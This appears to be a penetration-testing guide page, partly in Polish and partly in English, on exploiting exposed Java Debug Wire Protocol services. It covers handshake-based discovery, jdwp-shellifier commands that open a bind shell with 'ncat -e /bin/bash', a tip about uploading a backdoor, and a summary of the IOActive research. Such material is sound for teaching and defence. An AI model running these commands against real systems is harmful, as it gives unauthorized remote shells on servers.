Wykorzystywanie

Wykorzystywanie JDWP opiera się na braku uwierzytelniania i szyfrowania protokołu. Zwykle znajduje się na porcie 8000, ale możliwe są inne porty. Początkowe połączenie nawiązywane jest poprzez wysłanie "JDWP-Handshake" do docelowego portu. Jeśli usługa JDWP jest aktywna, odpowiada tym samym ciągiem, potwierdzając swoją obecność. Ten handshake działa jako metoda identyfikacji do rozpoznawania usług JDWP w sieci.

Jeśli chodzi o identyfikację procesów, wyszukiwanie ciągu "jdwk" w procesach Java może wskazywać na aktywną sesję JDWP.

Narzędziem, które warto użyć, jest jdwp-shellifier. Możesz go używać z różnymi parametrami:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

I found that the use of --break-on 'java.lang.String.indexOf' make the exploit more stabilny. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.

More details

This is a summary of https://ioactive.com/hacking-java-debug-wire-protocol-or-how/. Check it for further details.

1. JDWP Overview:

• It's a packet-based network binary protocol, primarily synchronous.

• Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.

2. JDWP Handshake:

• A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).

3. JDWP Communication:

• Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.

• CommandSet values range from 0x40 to 0x80, representing different actions and events.

4. Exploitation:

• JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.

• The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.

5. Real-Life Exploitation:

• Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.

• The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE).

6. Security Implications:

• The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.

References:

• [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/]

• https://github.com/IOActive/jdwp-shellifier

• http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html

• http://www.secdev.org/projects/scapy(no longer active)

• http://www.shodanhq.com/search?q=JDWP-HANDSHAKE

• http://www.hsc-news.com/archives/2013/000109.html (no longer active)

• http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt

• https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults

• http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html

• http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html

• http://nmap.org/nsedoc/scripts/jdwp-exec.html